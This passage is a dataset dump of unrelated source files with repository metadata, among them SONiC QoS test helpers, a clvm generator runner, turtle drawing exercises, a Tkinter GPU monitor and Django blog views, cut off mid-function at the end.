# @TODO: YOUR CODE HERE
# Add each value to the appropriate array
# @TODO: YOUR CODE HERE
# Store the Average Sentiments
# @TODO: YOUR CODE HERE
# Print the Sentiments
# @TODO: YOUR CODE HERE
| [
"ken.sh.jung@gmail.com"
] | ken.sh.jung@gmail.com |
e4d0583561a6158725a236905afe2fbba09c6263 | d1ad901e1e926d9c92ce4dc7a7ba3c6ee91a65e2 | /spytest/apis/qos/qos.py | c4158600f29cdeb92e9d1a8b3ac6ac00fa192bab | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] | permissive | SubhajitPalKeysight/sonic-mgmt | ff59c2c5baf53cc2575aea2d541278fc9cf56977 | e4b308a82572996b531cc09cbc6ba98b9bd283ea | refs/heads/master | 2022-12-31T01:03:47.757864 | 2020-10-15T11:04:37 | 2020-10-15T11:04:37 | 286,815,154 | 1 | 1 | NOASSERTION | 2020-08-11T18:08:34 | 2020-08-11T18:08:33 | null | UTF-8 | Python | false | false | 5,034 | py | import re
from spytest.utils import filter_and_select
from spytest import st
import json
def verify_qos_queue_counters(dut, port, queue_name, param_list, val_list, tol_list):
    '''
    Verifies QOS queue counters in the CLI "show queue counters" output.
    :param dut: device name where the command is to be executed
    :type dut: string
    :param port: interface name to be checked
    :type port: string
    :param queue_name: queue name to be checked (e.g. 'UC0')
    :type queue_name: string
    :param param_list: list of params to be verified; example ['pkts_count', 'pkts_drop']
    :param val_list: list of expected values for the params specified; example ['10000','5000']
    :param tol_list: tolerance value for each param while comparing; for example ['1000', '500']
    :return: True if every param is within val +/- tol, else False
    usage: verify_qos_queue_counters(dut1,'Ethernet0','UC0',['pkts_count', 'pkts_drop'],
           ['10000','5000'],['1000', '500'])
           verify_qos_queue_counters(dut1,'Ethernet0','UC0',['pkts_count'],['10000'],['1000'])
    Created by: Julius <julius.mariyan@broadcom.com
    '''
    success = True
    cli_out = st.show(dut, 'show queue counters {}'.format(port))
    fil_out = filter_and_select(cli_out, param_list, {"port": port, "txq": queue_name})
    if not fil_out:
        st.error('port: {} and queue name: {} not found in output: {}'.format(port, queue_name, cli_out))
        return False
    fil_out = fil_out[0]
    for param, val, tol in zip(param_list, val_list, tol_list):
        try:
            # Counters may be rendered with thousands separators ("1,234");
            # strip the commas before converting.
            observed = int(re.sub(",", "", fil_out[param]))
        except ValueError:
            st.error('cannot get integer value from obtained string: {}'.format(fil_out[param]))
            return False
        lower, upper = int(val) - int(tol), int(val) + int(tol)
        # BUG FIX: the adjacent string literals below used to be glued
        # together without a space ("...for param:in queue: ...").
        if lower <= observed <= upper:
            st.log('obtained value: {} is in the range b/w {} and {} as expected for param: {} '
                   'in queue: {}'.format(observed, lower, upper, param, queue_name))
        else:
            st.error('obtained value: {} is NOT in the range b/w {} and {} for param: {} '
                     'in queue: {}'.format(observed, lower, upper, param, queue_name))
            # Keep checking the remaining params so all failures are logged.
            success = False
    return success
def clear_qos_queue_counters(dut):
    '''
    Clear all QOS queue counters on the device.
    :param dut: DUT name where the CLI is to be executed
    :type dut: string
    :return: True on non-empty CLI output, False otherwise
    usage:
    clear_qos_queue_counters(dut1)
    Created by: Julius <julius.mariyan@broadcom.com
    '''
    output = st.show(dut, 'show queue counters --clear', skip_tmpl=True)
    return bool(output)
def bind_qos_map_port(dut, map_name, obj_name, interface):
    '''
    Associate a QOS map object with a port via the PORT_QOS_MAP table.
    :param dut: device to be configured
    :type dut: string
    :param map_name: qos map name, e.g. dscp_to_tc_map, tc_to_queue_map
    :type map_name: string
    :param obj_name: object name, e.g. AZURE
    :type obj_name: string
    :param interface: interface to be associated, e.g. Ethernet1
    :type interface: string
    :return: True/False  True - Success ; False - Failure
    usage:
    bind_qos_map_port(dut1, "tc_to_queue_map", "Azure", "Ethernet0")
    bind_qos_map_port(dut1, "dscp_to_tc_map", "Azure", "Ethernet2")
    bind_qos_map_port(dut1, "tc_to_pg_map", "Azure", "Ethernet72")
    Created by: Julius <julius.mariyan@broadcom.com
    '''
    # Reference syntax expected by the config DB: "[MAP_TABLE|object]".
    binding = "[" + map_name.upper() + "|" + obj_name + "]"
    config = {'PORT_QOS_MAP': {interface: {map_name: binding}}}
    return st.apply_json(dut, json.dumps(config))
def clear_qos_config(dut):
    '''
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    Remove all QOS-related configuration from the device.
    :param dut: device under test
    :return: None
    '''
    st.config(dut, "config qos clear")
def create_qos_json(dut, block_name, sub_block, dict_input):
    '''
    Apply a QOS JSON fragment of the form {BLOCK: {sub_block: dict_input}}.
    :param dut: device to be configured
    :type dut: string
    :param block_name: name of the field in json, e.g. dscp_to_tc_map, wred_profile
    :type block_name: string
    :param sub_block: sub field name, e.g. AZURE, AZURE_LOSSLESS
    :type sub_block: string
    :param dict_input: input values as a dictionary
    :type dict_input: dict
    :return: True/False  True - Success ; False - Failure
    usage:
    create_qos_json(dut1, "tc_to_queue_map", "Azure", {"wred_green_enable" : "true"})
    Created by: Julius <julius.mariyan@broadcom.com
    '''
    payload = {block_name.upper(): {sub_block: dict_input}}
    return st.apply_json(dut, json.dumps(payload))
| [
"noreply@github.com"
] | noreply@github.com |
6585fb31b416dfd35f83c956c594528d69b6d742 | 3fe5046326c0e6a63b9de6ab4de8f094f1e49614 | /bin/indent-ged | 165c4adbf540abe1e9a436dfd7f6e341711abfa8 | [] | no_license | dave-shawley/ged-work | cc7d6b71a58e3ac05d94177c018efe969fc60e0d | 1edc7d6c2b871d65668a7ec347a42d3727e615d1 | refs/heads/master | 2020-03-23T22:01:52.407922 | 2019-04-21T14:33:06 | 2019-04-21T14:33:06 | 142,148,536 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | #!/usr/bin/env python
#
# Rewrite a GEDCOM-style file in place: each line begins with a numeric
# level, and this prepends that many tab characters so the hierarchy is
# visually indented.  The original line (level number included) is kept.
import sys

with open(sys.argv[1], 'r+') as f:
    lines = f.readlines()
    f.seek(0)
    for line in lines:
        parts = line.split(None, 1)
        if not parts:
            # BUG FIX: a blank line used to crash the unpacking
            # "indent, rest = ..."; pass it through unchanged instead.
            f.write(line)
            continue
        # parts[0] is the level number; the unused "rest" binding is gone.
        f.write('\t' * int(parts[0]))
        f.write(line)
| [
"daveshawley@gmail.com"
] | daveshawley@gmail.com | |
cefb634734daaaddf09a98024d5ec5e44fb354b5 | edb88981aa1420af7e074068ed7818b9d904a3dd | /tags/release-0.4.2/minds/test/test_cachefile.py | 550d17ef92064fd5da222650ab9c462809cf2eb8 | [] | no_license | BackupTheBerlios/mindretrieve-svn | 101c0f1dfc25d20d5f828b6fd0d43301b773af4e | 463745fcf1c1d5b1f6c201c30bcc339c99b437ed | refs/heads/master | 2021-01-22T13:57:31.225772 | 2006-04-28T04:24:43 | 2006-04-28T04:24:43 | 40,801,743 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,722 | py | """
"""
import os, os.path, sys
import unittest
from config_help import cfg
from minds import cachefile
class TestCacheFile(unittest.TestCase):
    """Tests for minds.cachefile.CacheFile overflow and spill-to-disk behaviour."""

    # Base name (no extension) of the spill files created by these tests.
    FILE1 = 'testcache'

    def setUp(self):
        self.pathname = os.path.join(cfg.getPath('logs'), self.FILE1)
        self.cleanup()

    def tearDown(self):
        self.cleanup()

    def cleanup(self):
        # hardcode path to avoid deleting real data in config goof
        try: os.remove('testlogs/' + self.FILE1 + '.mlog')
        except OSError: pass
        try: os.remove('testlogs/' + self.FILE1 + '.qlog')
        except OSError: pass

    def test_write(self):
        """Writing past the limit overflows; spill files appear only on request."""
        # BUG FIX: the deprecated TestCase.assert_ alias (removed in
        # Python 3.12) is replaced throughout with assertTrue/assertFalse,
        # which are behaviourally identical.
        c = cachefile.CacheFile(10)
        c.write('hello')
        self.assertFalse(c.isOverflow())
        c.write('how are you?')
        self.assertTrue(c.isOverflow())
        self.assertFalse(os.path.exists(self.pathname+'.qlog'))
        self.assertFalse(os.path.exists(self.pathname+'.mlog'))
        c.write_qlog(self.FILE1)
        self.assertTrue(os.path.exists(self.pathname+'.qlog'))
        # NOTE(review): the second argument here is only the failure
        # *message*; the original almost certainly meant
        # assertEqual(getsize(...), 5).  Kept as a truthiness check to
        # preserve the original behaviour — confirm the expected sizes
        # before tightening.
        self.assertTrue(os.path.getsize(self.pathname+'.qlog'), 5)
        c.write_mlog(self.FILE1)
        self.assertTrue(os.path.exists(self.pathname+'.mlog'))
        self.assertTrue(os.path.getsize(self.pathname+'.mlog'), 5)

    def test_discard(self):
        """discard() drops overflowed data without creating spill files."""
        c = cachefile.CacheFile(10)
        c.write('hello')
        self.assertFalse(c.isOverflow())
        c.write('how are you?')
        self.assertTrue(c.isOverflow())
        c.discard()
        self.assertFalse(os.path.exists(self.pathname+'.qlog'))
        self.assertFalse(os.path.exists(self.pathname+'.mlog'))
if __name__ == '__main__':
unittest.main() | [
"tungwaiyip@785ff9d5-dded-0310-b5f2-a5aff206d990"
] | tungwaiyip@785ff9d5-dded-0310-b5f2-a5aff206d990 |
decce59127ee788d769e1ab985ac7c12d47f4947 | a0f795a1ef272eb7dbc2b3bab01b900414118fea | /tests/run_gen.py | 53cce7444df66935a441ce5aa7ff6b56979b85f6 | [
"Apache-2.0"
] | permissive | petanix/clvm_rs | a793e0df1a07d963fdf5014c8fe5d18ec3cd0971 | 51cac4558172d77dc11fcc2f2ccfed5b54edd11b | refs/heads/main | 2023-07-07T09:02:09.817738 | 2021-08-02T09:08:13 | 2021-08-02T09:08:13 | 391,870,474 | 0 | 0 | Apache-2.0 | 2021-08-02T08:30:28 | 2021-08-02T08:30:27 | null | UTF-8 | Python | false | false | 4,094 | py | #!/usr/bin/env python3
from clvm_rs import run_generator, STRICT_MODE
from clvm.operators import OP_REWRITE
from clvm import KEYWORD_FROM_ATOM, KEYWORD_TO_ATOM
from time import time
from clvm_tools import binutils
import sys
from run import native_opcode_names_by_opcode
def run_gen(fn):
    """Assemble the clvm source in file *fn* and execute it through the
    chia block-generator ROM.

    Returns whatever ``run_generator`` returns — unpacked by the caller
    as ``(error_code, result, cost)``.
    """
    # the generator ROM from:
    # https://github.com/Chia-Network/chia-blockchain/blob/main/chia/wallet/puzzles/rom_bootstrap_generator.clvm.hex
    program_data = bytes.fromhex(
        "ff02ffff01ff02ff0cffff04ff02ffff04ffff02ff05ffff04ff08ffff04ff13"
        "ff80808080ff80808080ffff04ffff01ffffff02ffff01ff05ffff02ff3effff"
        "04ff02ffff04ff05ff8080808080ffff04ffff01ffffff81ff7fff81df81bfff"
        "ffff02ffff03ffff09ff0bffff01818080ffff01ff04ff80ffff04ff05ff8080"
        "80ffff01ff02ffff03ffff0aff0bff1880ffff01ff02ff1affff04ff02ffff04"
        "ffff02ffff03ffff0aff0bff1c80ffff01ff02ffff03ffff0aff0bff1480ffff"
        "01ff0880ffff01ff04ffff0effff18ffff011fff0b80ffff0cff05ff80ffff01"
        "018080ffff04ffff0cff05ffff010180ff80808080ff0180ffff01ff04ffff18"
        "ffff013fff0b80ffff04ff05ff80808080ff0180ff80808080ffff01ff04ff0b"
        "ffff04ff05ff80808080ff018080ff0180ff04ffff0cff15ff80ff0980ffff04"
        "ffff0cff15ff0980ff808080ffff04ffff04ff05ff1380ffff04ff2bff808080"
        "ffff02ff16ffff04ff02ffff04ff09ffff04ffff02ff3effff04ff02ffff04ff"
        "15ff80808080ff8080808080ff02ffff03ffff09ffff0cff05ff80ffff010180"
        "ff1080ffff01ff02ff2effff04ff02ffff04ffff02ff3effff04ff02ffff04ff"
        "ff0cff05ffff010180ff80808080ff80808080ffff01ff02ff12ffff04ff02ff"
        "ff04ffff0cff05ffff010180ffff04ffff0cff05ff80ffff010180ff80808080"
        "8080ff0180ff018080ff04ffff02ff16ffff04ff02ffff04ff09ff80808080ff"
        "0d80ffff04ff09ffff04ffff02ff1effff04ff02ffff04ff15ff80808080ffff"
        "04ff2dffff04ffff02ff15ff5d80ff7d80808080ffff02ffff03ff05ffff01ff"
        "04ffff02ff0affff04ff02ffff04ff09ff80808080ffff02ff16ffff04ff02ff"
        "ff04ff0dff8080808080ff8080ff0180ff02ffff03ffff07ff0580ffff01ff0b"
        "ffff0102ffff02ff1effff04ff02ffff04ff09ff80808080ffff02ff1effff04"
        "ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff0180"
        "80")
    # constants from the main chia blockchain:
    # https://github.com/Chia-Network/chia-blockchain/blob/main/chia/consensus/default_constants.py
    max_cost = 11000000000
    cost_per_byte = 12000
    # BUG FIX: the input file was opened inline and never closed; a context
    # manager guarantees the handle is released even if assembly fails.
    with open(fn, "r") as source:
        env_data = binutils.assemble(source.read()).as_bin()
    # we don't charge for the size of the generator ROM. However, we do charge
    # cost for the operations it executes
    max_cost -= len(env_data) * cost_per_byte
    # add the block program arguments
    block_program_args = b"\xff\x80\x80"
    env_data = b"\xff" + env_data + b"\xff" + block_program_args + b"\x80"
    return run_generator(
        program_data,
        env_data,
        KEYWORD_TO_ATOM["q"][0],
        KEYWORD_TO_ATOM["a"][0],
        native_opcode_names_by_opcode,
        max_cost,
        0,
    )
if __name__ == "__main__":
    try:
        start_time = time()
        # sys.argv[1]: path to the clvm source file to assemble and run.
        error_code, result, cost = run_gen(sys.argv[1])
        run_time = time() - start_time
        if error_code is not None:
            print(f"Validation Error: {error_code}")
            print(f"run-time: {run_time:.2f}s")
            sys.exit(1)
        start_time = time()
        # Print each spend (coin) and its conditions; everything is sorted
        # so the output is deterministic and diff-able between runs.
        for r in sorted(result):
            print(f"coin: {r.coin_name.hex()} ph: {r.puzzle_hash.hex()}")
            for c in sorted(r.conditions):
                print(f"  {c[0]}")
                for cwa in sorted(c[1], key=lambda x: (x.opcode, x.vars)):
                    print(f"    {cwa.opcode}", end="")
                    for a in cwa.vars:
                        print(f" {a.hex()}", end="")
                    print("")
        print_time = time() - start_time
        print(f"cost: {cost}")
        print(f"run-time: {run_time:.2f}s")
        print(f"print-time: {print_time:.2f}s")
    except Exception as e:
        # Broad catch so a failing run still reports the elapsed time; the
        # exception text is printed rather than re-raised.
        run_time = time() - start_time
        print("FAIL:", e)
        print(f"run-time: {run_time:.2f}s")
| [
"noreply@github.com"
] | noreply@github.com |
7220f69ad40171e2f3b038363316ca5856f0f28a | 6d95e2b9617080dbd1a5389fb02bad757e47f868 | /os_tkmonitor/os_tkmonitor_nouveau.py | 7ade64df569bec61bf3af5b2490d98ecca678c7a | [] | no_license | frank038/os_tkmonitor | 88ad22a0a062432f430d578d71c6313e36885222 | 5c0cfff59703c2023141f16ea130e5728298f4d9 | refs/heads/master | 2020-06-23T00:06:34.187928 | 2019-07-23T15:03:41 | 2019-07-23T15:03:41 | 198,439,850 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,926 | py | #!/usr/bin/env python3
"""
nvidia gpu module - driver nouveau
"""
import tkinter as tk
import tkinter.ttk as ttk
import os
import sys
import shutil
import subprocess
class FNV(ttk.Frame):
    """Tk frame showing NVIDIA GPU information for the open-source
    nouveau driver: a static label grid next to the NVIDIA logo plus a
    once-per-second refresh loop (fupdate).
    """
    def __init__(self, master, root, frg_color):
        """Build the widget grid.
        master -- parent widget the frame packs itself into
        root -- Tk root window, used for the .after() refresh timer
        frg_color -- foreground colour for the caption labels
        """
        super().__init__(master)
        self.master = master
        self.root = root
        #
        self.pack()
        # blank line
        ttk.Label(self, text=" ").grid(column=0, row=0)
        # logo
        # Loaded from the current working directory; the reference is kept
        # on self so Tk does not garbage-collect the image.
        self.nv_logo = tk.PhotoImage(file="NVLogo.png")
        self.lab_logo = ttk.Label(self, text="logo", image=self.nv_logo)
        self.lab_logo.grid(column=0, row=1, sticky="NW", rowspan=8)
        ## gpu name
        # NOTE: Label(...).grid(...) returns None, so the gpu_name*-style
        # locals below all hold None; the widgets stay alive through Tk.
        # The static values are placeholders — presumably nouveau exposes
        # no query interface for them (TODO confirm).
        tgpu_name = ""
        gpu_name = ttk.Label(self, text="Product Name ", foreground=frg_color).grid(column=1, row=2, sticky="NE")
        gpu_name2 = ttk.Label(self, text=tgpu_name).grid(column=2, row=2, sticky="NW")
        ## driver version
        gpu_driver_version = ""
        gpu_drv_ver = ttk.Label(self, text="Driver Version ", foreground=frg_color).grid(column=1, row=3, sticky="NE")
        gpu_drv_ver2 = ttk.Label(self, text=gpu_driver_version).grid(column=2, row=3, sticky="NW")
        ## total memory
        gpu_totmem = ""
        gpu_tot_mem = ttk.Label(self, text="Total Memory ", foreground=frg_color).grid(column=1, row=4, sticky="NE")
        gpu_tot_mem2 = ttk.Label(self, text=gpu_totmem).grid(column=2, row=4, sticky="NW")
        ## memory used
        gpu_usedmem = ""
        gpu_used_mem = ttk.Label(self, text="Memory Used ", foreground=frg_color).grid(column=1, row=5, sticky="NE")
        gpu_used_mem2 = ttk.Label(self, text=gpu_usedmem).grid(column=2, row=5, sticky="NW")
        ## clock
        # StringVar-backed labels: fupdate() rewrites these periodically.
        self.gpu_clock = tk.StringVar()
        self.gpu_clock.set("")
        gpu_clock = ttk.Label(self, text="Clock ", foreground=frg_color).grid(column=1, row=6, sticky="NE")
        gpu_clock2 = ttk.Label(self, textvariable=self.gpu_clock).grid(column=2, row=6, sticky="NW")
        ## temperature
        self.gpu_temperature = tk.StringVar()
        self.gpu_temperature.set("")
        gpu_temp = ttk.Label(self, text="Temperature ", foreground=frg_color).grid(column=1, row=7, sticky="NE")
        gpu_temp2 = ttk.Label(self, textvariable=self.gpu_temperature).grid(column=2, row=7, sticky="NW")
        ## gpu usage
        self.gpu_usage = tk.StringVar()
        self.gpu_usage.set("")
        gpu_usage = ttk.Label(self, text="Usage ", foreground=frg_color).grid(column=1, row=8, sticky="NE")
        gpu_usage2 = ttk.Label(self, textvariable=self.gpu_usage).grid(column=2, row=8, sticky="NW")
        # Kick off the 1-second refresh loop.
        self.fupdate()
    def fupdate(self):
        """Refresh the dynamic values and re-schedule itself every second.
        NOTE(review): all three setters currently write empty strings —
        the nouveau query back-end appears not to be implemented yet.
        """
        # clock
        self.gpu_clock.set("")
        # temperature
        self.gpu_temperature.set("")
        # usage
        self.gpu_usage.set("")
        self.root.after(1000, self.fupdate)
| [
"noreply@github.com"
] | noreply@github.com |
5d650359e4a6cabc6ceb6bb2ab9f212feb1a9bfe | c9479bdcac0c3ebd1a2d107f4a2e303a36f3eb72 | /task1.py | d3cab55da3944d7f6b6ef91c5d03ed71eca62782 | [] | no_license | nathanwag15/snowmanandCuboid | 1891426d5a9ad5c5fba8b3497d5d0db2211b0101 | b81e849e421c55504fc3a447af0acaa90675a7f8 | refs/heads/master | 2022-11-09T06:49:37.867486 | 2020-06-09T20:33:52 | 2020-06-09T20:33:52 | 271,104,144 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,728 | py | #Nathan Wagstaff Assignment #4
# A snowman with two arms and a hat.
import turtle
#settings
turtle.speed(1)
turtle.width(10)
#base (largest circle, drawn from its bottom point)
turtle.penup()
turtle.goto(0, -300)
turtle.pendown()
turtle.circle(150)
#middle
turtle.penup()
turtle.goto(0, 0)
turtle.pendown()
turtle.circle(105)
#buttons (three tiny circles up the middle section)
turtle.penup()
turtle.goto(0, 50)
turtle.pendown()
turtle.circle(1)
turtle.penup()
turtle.goto(0,100)
turtle.pendown()
turtle.circle(1)
turtle.penup()
turtle.goto(0,150)
turtle.pendown()
turtle.circle(1)
#head
turtle.penup()
turtle.goto(0, 210)
turtle.pendown()
turtle.circle(60)
#Hat (brim stroke, then a filled black rectangle on top)
turtle.penup()
turtle.goto(0, 330)
turtle.pendown()
turtle.forward(70)
turtle.begin_fill()
turtle.goto(40, 330)
turtle.left(90)
turtle.forward(40)
turtle.left(90)
turtle.forward(80)
turtle.left(90)
turtle.forward(40)
turtle.left(90)
turtle.forward(40)
turtle.fillcolor("black")
turtle.end_fill()
turtle.goto(-70, 330)
#Eyes
turtle.penup()
turtle.goto(-20, 280)
turtle.pendown()
turtle.circle(2)
turtle.penup()
turtle.goto(20, 280)
turtle.pendown()
turtle.circle(2)
#mouth (half-circle smile)
turtle.penup()
turtle.goto(-20, 240)
turtle.pendown()
turtle.left(-90)
turtle.circle(20, 180)
#right arm (stick with three zig-zag fingers)
turtle.penup()
turtle.goto(100, 100)
turtle.pendown()
turtle.left(200)
turtle.forward(150)
turtle.left(70)
turtle.forward(30)
turtle.left(180)
turtle.forward(30)
turtle.left(20)
turtle.forward(30)
turtle.left(180)
turtle.forward(30)
turtle.left(270)
turtle.forward(30)
#left arm (mirror of the right arm; comment fixed — it previously said "right arm")
turtle.penup()
turtle.goto(-100, 100)
turtle.pendown()
turtle.left(200)
turtle.forward(150)
turtle.left(70)
turtle.forward(30)
turtle.left(180)
turtle.forward(30)
turtle.left(20)
turtle.forward(30)
turtle.left(180)
turtle.forward(30)
turtle.left(270)
turtle.forward(30)
| [
"natewagstaff21@gmail.com"
] | natewagstaff21@gmail.com |
d4ff66e3840020400fd3bc1f0961d882357aa743 | c0598fcf7680dd7919b319f597f3730e1dc56ec7 | /Lab2/task13.py | 6e03b93c2cc52171b3e032c5b1580373a326f9f5 | [] | no_license | Andreev1189/Labs-python-2021 | 2fc787bb2454d841b42643b9d1d616d0cd4977d8 | ba4c178dc79acd8e581064a2c9eb6c0b5c9fc0c3 | refs/heads/main | 2023-08-05T15:48:48.060674 | 2021-10-04T07:29:30 | 2021-10-04T07:29:30 | 413,296,552 | 0 | 0 | null | 2021-10-04T06:15:41 | 2021-10-04T06:15:41 | null | UTF-8 | Python | false | false | 1,041 | py | import turtle
import math
from random import *
def arc(r):
    """Draw a black half-circle arc as 100 straight segments of length r."""
    turtle.color('Black')
    segments = 100
    turn = 180 / segments
    for _ in range(segments):
        turtle.forward(r)
        turtle.right(turn)
def circle(r):
    """Approximate a full circle: 201 green segments of length r, pen width 2."""
    turtle.color('Green')
    turtle.width(2)
    sides = 200
    for _ in range(sides + 1):
        turtle.forward(r)
        turtle.left(360 / sides)
# Face: large filled yellow circle (circle() walks the perimeter, so for
# r=3 the radius comes out at roughly 3*200/(2*pi) ~ 95 px).
turtle.begin_fill()
circle(3)
turtle.color('Yellow')
turtle.end_fill()
# Left eye: small filled blue circle.
turtle.penup()
turtle.color('Blue')
turtle.goto(- 30, 120)
turtle.pendown()
turtle.begin_fill()
circle(0.5)
turtle.color('Blue')
turtle.end_fill()
# Right eye.
turtle.penup()
turtle.goto(30, 120)
turtle.pendown()
turtle.begin_fill()
circle(0.5)
turtle.color('Blue')
turtle.end_fill()
# Nose: a single thick black stroke angled down from the face centre.
turtle.penup()
turtle.goto(0, 100)
turtle.pendown()
turtle.width(10)
turtle.color('Black')
turtle.right(95)
turtle.forward(40)
# Smile: red half-arc drawn segment by segment (same idea as arc()).
turtle.color('Red')
turtle.penup()
turtle.goto(45, 70)
turtle.pendown()
n = 100
for i in range(n):
    turtle.forward(1.4)
turtle.right(180 / n) | [
"noreply@github.com"
] | noreply@github.com |
256a78690243b47369486b84acba56ba650f403c | 4131625553ff59b4c730ae7148dd5d603d8cb87d | /hackerEarth/challenges/iitKanpurFreshersProgrammingContest2016/pokeluck.py | 30419fb90a7798a46de3e00cf2d4155fda419afc | [
"MIT",
"Apache-2.0"
] | permissive | odonnmi/learnNPractice | 29034304303aab3827e6b3334b1d7d9d65b93e54 | eb1c775e4d6e35cebb7b109b46b91f9aecb2d9ec | refs/heads/master | 2020-12-04T14:52:00.520219 | 2019-09-03T06:30:03 | 2019-09-03T06:30:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,781 | py | # Pokeluck
#######################################################################################################################
#
# Mewtwo is one of the rarest and most famous pokemons in the pokemon world. If any pokemon gets to fight with
# Mewtwo, he is considered to be "1-lucky". A pokemon that gets to fight with the pokemon who has fought with
# Mewtwo is considered to be "2-lucky", and so on.
#
# The Luckiness is defined on the basis of above mentioned rule. ( 1-Lucky -> Luckiness = 1).
#
# Note1: Consider luckiness of Mewtwo to be 0 .
#
# Note2: No one has negative luckiness.
#
# Note3: If a pokemon A is not Mewtwo himself, and has battled with someone with luckiness X, and has not battled
# with anyone with Luckiness smaller than X, then A has luckiness X+1 .
#
# Note4: It is ensured that every pokemon has finite positive luckiness.
#
# Input:
#
# The first line has two numbers: A,number of pokemons being considered and B, number of pokemon battles
# that have happened.
#
# Then B lines follow, each containing two distinct pokemons, denoting that the two pokemons have battled.
# Pokemons are represented by numbers between 1 and A.
#
# Mewtwo is represented by 1.
#
# Output Format:
#
# Output A-1 lines , ith line containing the luckiness of ith pokemon. (2 <= i <= A)
#
# Constraints:
#
# A <= 1000
#
# B <= (A(A-1))/2 ]
#
#######################################################################################################################
# Input
#
# 3 2
# 1 2
# 2 3
#######################################################################################################################
# Output
#
# 1
# 2
####################################################################################################################### | [
"sagarnikam123@gmail.com"
] | sagarnikam123@gmail.com |
ad6fa5571d9c4ecd03ce8e83db718c9c9dde6bb2 | 2f36dc886195b67fd6fe0de48984e0268b3e0d71 | /html-service/html_service.py | 15c083d5cc4c0c88804445b6a992a4a2fbbe94af | [] | no_license | aek/zato-labs | 84d52b3d1eea515c91fa6e7d4a439af3ee35ca05 | 302e40b8825f8fba5e3ea065280af742904fb25b | refs/heads/master | 2020-12-26T08:17:38.664195 | 2014-02-16T21:30:27 | 2014-02-16T21:30:27 | 16,894,545 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,093 | py | # -*- coding: utf-8 -*-
"""
Copyright (C) 2013 Dariusz Suchojad <dsuch at zato.io>
Licensed under LGPLv3, see LICENSE.txt for terms and conditions.
"""
# stdlib
from cStringIO import StringIO
from logging import DEBUG
# Django
from django.conf import settings
from django.template import Context, Template
# Zato
from zato.server.service import Service
# Configure Django settings when the module is picked up
if not settings.configured:
settings.configure()
class HTMLService(Service):
    """Base Zato service that renders a Django template into an HTML response."""

    def generate_payload(self, ctx, template):
        """Render *template* with the context dict *ctx* and store the
        UTF-8-encoded result as this service's HTTP response payload,
        with a text/html content type.
        """
        # Generate HTML and return response
        c = Context(ctx)
        t = Template(template)
        payload = t.render(c).encode('utf-8')
        self.logger.debug('Ctx:[%s]', ctx)
        self.logger.debug('Payload:[%s]', payload)
        if self.logger.isEnabledFor(DEBUG):
            # BUG FIX: pprint was used here without ever being imported,
            # so enabling DEBUG logging raised NameError.  Imported lazily
            # so the common non-debug path pays no cost.
            from pprint import pprint
            buff = StringIO()
            pprint(ctx, buff)
            self.logger.debug(buff.getvalue())
            buff.close()
        self.response.payload = payload
        self.response.content_type = 'text/html; charset=utf-8'
| [
"dsuch-github@m.zato.io"
] | dsuch-github@m.zato.io |
788e4f26f9ce4a49e8009089a81dd509608996ca | 1c527a1944264784ba6ed237a723376bdee47f02 | /src/utl/strip_csv.py | 0c3dc9fa82235b03ec8b3ca868c5a6d64b12ed89 | [] | no_license | mikegleen/modes | 3544517467b77ddb21ec50c2a624b98e0a7ea308 | e77c89f28c623ce8fd30d7727a1b914461c6a0fd | refs/heads/master | 2023-09-03T15:10:26.931110 | 2023-08-27T07:31:42 | 2023-08-27T07:31:42 | 139,562,349 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | """
For each cell in a CSV file, strip leading and trailing whitespace.
"""
import codecs
import csv
import sys
def main():
    """Strip leading/trailing whitespace from every cell of a CSV file.

    Usage: strip_csv.py <input.csv> <output.csv>

    Both files are handled as UTF-8 with a BOM (utf-8-sig), preserving the
    original behaviour.
    """
    # BUG FIX: the two file handles were never closed; context managers
    # guarantee they are closed (and the output flushed) even on error.
    with codecs.open(sys.argv[1], 'r', 'utf-8-sig') as incsv, \
            codecs.open(sys.argv[2], 'w', 'utf-8-sig') as outcsv:
        outwriter = csv.writer(outcsv)
        for row in csv.reader(incsv):
            # str.strip() on an empty string is a no-op, so the original
            # "if cell" guard was redundant.
            outwriter.writerow([cell.strip() for cell in row])


if __name__ == '__main__':
    main()
| [
"mike.gleen@gmail.com"
] | mike.gleen@gmail.com |
931228bd1d0c10ee686af5daf5aa5cbe4bdfae19 | 96551f7ae1ab0d9bc24bc442dec196caaf328aff | /blog/views.py | 8beccf1c0bec9795611be28385c5b537abd3635c | [] | no_license | moaiii/CastawayYourWorries | cd26d4f8535aab478e3fb1bbd3050fa95bd755be | 3226622647cdbd0eea55a38540e3b1a7dcdef186 | refs/heads/master | 2021-01-19T22:47:50.201594 | 2017-05-22T11:13:44 | 2017-05-22T11:13:44 | 88,859,645 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,062 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals

# Project imports (implicit-relative, Python 2 style).  Note: Post from
# blog.models is deliberately shadowed by the later models import, as in
# the original ordering.
from blog.models import Post, General
from models import Post, Email
from serializers import PostSerializer
# BUG FIX: EmailSerializer is used by email_list() below but was never
# imported, raising NameError at request time.
from serializers import EmailSerializer

# Django
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt

# Django REST framework
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
def index(request):
    """Render the blog front page: all published posts plus site-wide data."""
    published = Post.objects.filter(published=True)
    site_info = General.objects.get(pk=1)
    return render(request, 'index.html', {'posts': published, 'general': site_info})
def post(request, slug):
    """Render a single blog post looked up by slug (404 when absent)."""
    # Local renamed from "post" so it no longer shadows this view function.
    entry = get_object_or_404(Post, slug=slug)
    return render(request, 'post.html', {'post': entry})
@csrf_exempt
def post_list(request):
    """List all posts as JSON (GET) or create one from a JSON body (POST)."""
    if request.method == 'POST':
        incoming = JSONParser().parse(request)
        serializer = PostSerializer(data=incoming)
        if not serializer.is_valid():
            return JsonResponse(serializer.errors, status=400)
        serializer.save()
        return JsonResponse(serializer.data, status=201)
    elif request.method == 'GET':
